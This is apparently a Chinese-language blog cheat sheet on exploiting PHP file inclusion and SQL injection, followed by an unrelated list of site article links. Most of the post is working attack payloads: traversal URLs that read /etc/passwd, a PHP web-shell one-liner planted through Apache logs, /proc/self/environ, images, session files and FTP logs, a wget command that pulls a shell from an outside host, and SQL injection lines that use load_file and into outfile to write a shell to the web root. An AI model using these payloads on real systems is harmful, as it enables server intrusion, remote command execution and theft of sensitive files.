文件包含与注入利用总结
1、文件包含利用
通过传递本地或者远程的文件(allow_url_fopen开启)作为参数进行利用,可以读取敏感信息、执行命令、GetWebshell.
例如
require($file);
Include($file);
Exploit:
http://www.XXX.net/?file=/etc/passwd
Type of call:
require(“includes/”.$file);
Exploit:
http://www.XXX.net/?file=../../../../../etc/passwd
Tpye of calls:
require(“languages/”.$lang.”.php”);
require(“themes/”.$theme.”/config.php”);
Exploit:
http://www.XXX.net/?file=../../../../../etc/passwd%00
Type of call:
require(“languages/”.$_COOKIE['lang'].”.php”);
Exploit:
javascript:document.cookie = “lan=../../../../../etc/passwd%00″;
2、包含命令执行
当能够把这句代码<? passthru($_GET[cmd]) ?> 上传到服务器,然后利用文件包含就可以。
利用方式1:将内容插入apache日志里面。
请求不存在的页面:http://www.XXX.net/xxxxxxx=<? passthru($_GET[cmd]) ?>
然后按照前面的方式请求:
http://www.XXX.net/?file=../../../var/apache/error_log&cmd=ls /etc
http://www.XXX.net/?file=../../../var/apache/error_log&cmd=uname -a
如果不知道apache地址,可以利用包含已有的文件报错来爆出当前位置,当然这个也得依靠不同的操作系统,apache默认地址不一样。
另外可以通过枚举进程表来定位apache日志路径。/proc/{PID}/fd/{FD_ID}
代码(略)
pepelux:~$ perl proc.pl http://www.XXX.net/index.php page GET
Apache PID: 4191
FD_SIZE: 64
FD: 2
得到PID 和 FD_ID后就可以这么构造。
http://www.XXX.net/?file=/proc/4191/fd/2&cmd=uname -a
http://www.XXX.net/index.php?x=<? passthru($_GET[cmd]) ?>
如果不成功,把<?转为16进制。
不行的话还可以把段字符放在header字段里面,比如说User-Agent、Referer
利用方式2:通过环境变量进行插入
/proc/self 指向最后一个PID使用的链接。
/proc/self/environ 是一个已知的路径,但是一般用户没权限读取。
在linux系统中,/proc/self是因为是个能写的环境变量,而且位置是固定的。
利用的话先把利用代码放在User-Agent进行提交,
然后请求:http://www.XXX.net/?file=../../../proc/self/environ&cmd=uname -a
没看懂,一般权限应该不行。
利用方式3:将代码插入到图片中
讲一句话添加到图片中,然后上传直接利用。
http://www.XXX.net/?file=path/avatar.gif&cmd=uname -a
利用方式4:将代码插入到session文件中
如果是通过session验证的,并且知道session的字段。
http://www.XXX.net/?user=<? passthru($_GET[cmd]) ?>
找session值(浏览器)和文件位置(一般/tmp/session值)。
然后直接包含。
利用方式5: 其他文件
其他日志,FTP的话提交用户名为<? passthru($_GET[cmd]) ?>
服务器版本较老的话,可以利用PUT方式提交代码。
获取shell:
http://www.XXX.net/?file=xxxx&cmd=wget http://devil/shell.txt -O shell.php
3、注入与文件包含
方式1:注入读取关键文件
http://www.XXX.net/?id=-1 UNION SELECT 1,2,3,load_file(‘/etc/passwd’);
magic_quotes开启的话
http://www.XXX.net/?id=-1 UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764);
方式2:先导出然后读取
http://www.XXX.net/?id=1 outfile “/tmp/sql.txt”
http://www.XXX.net/?id=-1 UNION SELECT 1,2,3,load_file(‘/tmp/sql.txt’);
方式3:直接生成一句话
http://www.XXX.net/?id=-1 union select 1,load_file(“/etc/passwd”),1 into outfile “/var/www/host.com/www/passwd”
http://www.XXX.net/?id=-1 union select 1,”<?phpinfo()?>”,1 into outfile “/var/www/host.com/www/phpinfo.php”
如果目录不能写,可以先导出到tmp
http://host/?id=-1 union select 1,”<? passthru($_GET[cmd]) ?>”,1,1 into outfile “/tmp/sql.txt”
http://host/?file=../../../tmp/sql.txt&cmd=uname -a
补充说明:
1) php5.3.4以后已经修复了%00漏洞。
2) 参考文件中有几个perl写的小工具帮助利用。
3)LFI配合phpinfo获取shell,参见LFI With PHPInfo Assistance.pdf
- 程序实现下载文件或者打开文件
- VisualTreeHelper
- Linux下路由配置梳理
- Gitlab利用Webhook实现Push代码后的jenkins自动构建
- db4o 7.4 for .net3.5试用手记
- JQuery笔记(五) 圆角表格的效果
- tomcat内存溢出问题记录
- 微信小程序开放 Wi-Fi、NFC 连接能力,未来可直接刷地铁?
- 2017奇葩机器人大盘点:Sophia想生孩子,Atlas后空翻,贝佐斯骑高达
- silverlight:分享一个不错的自定义布局CollectionFlow(可用于制作相册的哦!)
- 无法取得ConnectionSettings的问题
- DataTable,List去重复记录的方法
- Uploadify的一点总结
- 自动驾驶时代,中国移动要以怎样的姿势进入?
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 苏宁基于 ClickHouse 的大数据全链路监控实践
- CORS Cross Origin Resource Sharing
- 从0开始做播放器-第二季-第2章-Android NDK 工程的建立和 JNI 的基本用法
- 记一次线上问题排查-maven父子结构依赖所遇到的坑
- 『技术随手学』解决 pip conda install 网络故障中断
- boost asio
- 7.SwrContext音频重采样使用
- 8.ffmpeg-基础常用知识
- 9.下载ffmpeg、使QT支持同时编译32位和64位
- 10.QT-QAudioOutput类使用
- 11.QT-ffmpeg+QAudioOutput实现音频播放器
- Spring JPA 自定义删改
- LeetCode-28.实现 strStr()
- 【工具篇】程序员不愿意写 PPT 是姿势不对?
- 机器学习还能预测心血管疾病?没错,我用Python写出来了